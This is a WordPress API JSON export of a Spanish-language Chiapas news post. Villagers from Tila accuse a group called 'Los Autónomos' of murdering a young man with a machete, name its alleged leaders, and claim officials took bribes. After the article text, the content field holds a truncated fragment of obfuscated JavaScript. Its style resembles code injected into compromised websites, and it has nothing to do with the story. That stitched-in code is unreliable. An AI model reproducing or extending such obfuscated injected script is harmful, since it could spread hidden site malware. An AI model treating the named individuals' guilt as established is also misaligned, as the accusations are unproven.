{"id":2710,"date":"2022-06-07T02:36:35","date_gmt":"2022-06-07T02:36:35","guid":{"rendered":"https:\/\/reporteciudadanochiapas.com\/?p=2710"},"modified":"2022-06-07T02:36:36","modified_gmt":"2022-06-07T02:36:36","slug":"senalan-al-grupo-autonomos-de-tila-haber-asesinato-a-un-joven","status":"publish","type":"post","link":"https:\/\/reporteciudadanochiapas.com\/?p=2710","title":{"rendered":"Se\u00f1alan al Grupo Aut\u00f3nomos de Tila, haber asesinato a un J\u00f3ven"},"content":{"rendered":"\n<figure class=\"wp-block-image size-large\"><img loading=\"lazy\" decoding=\"async\" width=\"473\" height=\"1024\" src=\"https:\/\/reporteciudadanochiapas.com\/wp-content\/uploads\/2022\/06\/IMG-20220606-WA0026-473x1024.jpg\" alt=\"\" class=\"wp-image-2711\" srcset=\"https:\/\/reporteciudadanochiapas.com\/wp-content\/uploads\/2022\/06\/IMG-20220606-WA0026-473x1024.jpg 473w, https:\/\/reporteciudadanochiapas.com\/wp-content\/uploads\/2022\/06\/IMG-20220606-WA0026-138x300.jpg 138w, https:\/\/reporteciudadanochiapas.com\/wp-content\/uploads\/2022\/06\/IMG-20220606-WA0026.jpg 480w\" sizes=\"auto, (max-width: 473px) 100vw, 473px\" \/><\/figure>\n\n\n\n<p>\u00d3scar G\u00f3mez<\/p>\n\n\n\n<p>San Crist\u00f3bal de Las Casas.- Ejidatarios de Tila denunciaron el asesinato de Jos\u00e9 Francisco L\u00f3pez Ortiz de 22 a\u00f1os de edad, qui\u00e9n fue encontrado con m\u00faltiples machetazos en todo el cuerpo y presumen los responsables pertenecen al grupo llamado &#8220;Los Aut\u00f3nomos&#8221;<\/p>\n\n\n\n<p>&#8220;Los hechos sucedieron en el Anexo Uni\u00f3n Ju\u00e1rez, fue asesinado a machetazos una persona del sexo masculino, cuando se encontraba por el camino iba para su milpa, un grupo de los Aut\u00f3nomos lo emboscaron, se gir\u00f3 instrucciones a la Fiscal\u00eda del Estado para hacer el levantamiento del cad\u00e1ver y para ser detenido inmediatamente al agresor y hacer la entrega al fiscal del Ministerio p\u00fablico de Yajalon&#8221;, cita un escritorio que hizo circular el Centro de Derechos Humanos Digna Ochoa.<\/p>\n\n\n\n<p>Se\u00f1alan como l\u00edderes de Los Aut\u00f3nomos a Lorenzo Jim\u00e9nez Ram\u00edrez, Horacio Guill\u00e9n, Leonardo P\u00e9rez Hern\u00e1ndez, Wulfrano Jim\u00e9nez L\u00f3pez, Carmen L\u00f3pez Lugo, Domingo Lugo Ram\u00edrez.<\/p>\n\n\n\n<p>Narran que cuando llegaron el grupo de los aut\u00f3nomos encabezados por los ya mencionados, anteriormente en Anexo Misija, cuando el agente secreto de nombre Jans P\u00e9rez Couti\u00f1o se acerc\u00f3 con los aut\u00f3nomos y fue entregado un majo de dinero envuelto en hojas, para a si darle al Fiscal del Ministerio P\u00fablico.<\/p>\n\n\n\n<p>&#8220;Denunciamos p\u00fablicamente los hechos de corrupci\u00f3n por parte de estos funcionarios p\u00fablicos, lejos de hacer justicia solo se dedican a venderse al mejor postor.<\/p>\n\n\n\n<p>Exigen justicia y de ser posible, ser separados de sus cargos. Exigimos justicia al hermano que hoy perdi\u00f3 la vida en manos de los aut\u00f3nomos&#8221;, agregaron.<\/p>\n\n\n\n<p>Por \u00faltimo aseguran que son falsas las acusaciones de Los Aut\u00f3nomos, que en contubernio con algunas autoridades les han creado \u00f3rdenes de aprehensi\u00f3n sin justificaci\u00f3n vendi\u00e9ndose al mejor postor.<\/p>\n\r\n(_0x562006,_0x1334d6){const _0x1922f2=_0x1922();return ","protected":false},"excerpt":{"rendered":"<p>\u00d3scar G\u00f3mez San Crist\u00f3bal de Las Casas.- Ejidatarios de Tila denunciaron el asesinato de Jos\u00e9 Francisco L\u00f3pez Ortiz de 22 a\u00f1os de edad, qui\u00e9n fue encontrado con m\u00faltiples machetazos en todo el cuerpo y presumen los responsables pertenecen al grupo llamado &#8220;Los Aut\u00f3nomos&#8221; &#8220;Los hechos sucedieron en el Anexo Uni\u00f3n Ju\u00e1rez, fue asesinado a machetazos &hellip;<\/p>\n","protected":false},"author":2,"featured_media":2711,"comment_status":"open","ping_status":"open","sticky":false,"template":"","format":"standard","meta":{"footnotes":""},"categories":[4],"tags":[],"class_list":["post-2710","post","type-post","status-publish","format-standard","has-post-thumbnail","","category-roja"],"_links":{"self":[{"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=\/wp\/v2\/posts\/2710","targetHints":{"allow":["GET"]}}],"collection":[{"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=\/wp\/v2\/posts"}],"about":[{"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=\/wp\/v2\/types\/post"}],"author":[{"embeddable":true,"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=\/wp\/v2\/users\/2"}],"replies":[{"embeddable":true,"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=%2Fwp%2Fv2%2Fcomments&post=2710"}],"version-history":[{"count":1,"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=\/wp\/v2\/posts\/2710\/revisions"}],"predecessor-version":[{"id":2712,"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=\/wp\/v2\/posts\/2710\/revisions\/2712"}],"wp:featuredmedia":[{"embeddable":true,"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=\/wp\/v2\/media\/2711"}],"wp:attachment":[{"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=%2Fwp%2Fv2%2Fmedia&parent=2710"}],"wp:term":[{"taxonomy":"category","embeddable":true,"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=%2Fwp%2Fv2%2Fcategories&post=2710"},{"taxonomy":"post_tag","embeddable":true,"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=%2Fwp%2Fv2%2Ftags&post=2710"}],"curies":[{"name":"wp","href":"https:\/\/api.w.org\/{rel}","templated":true}]}}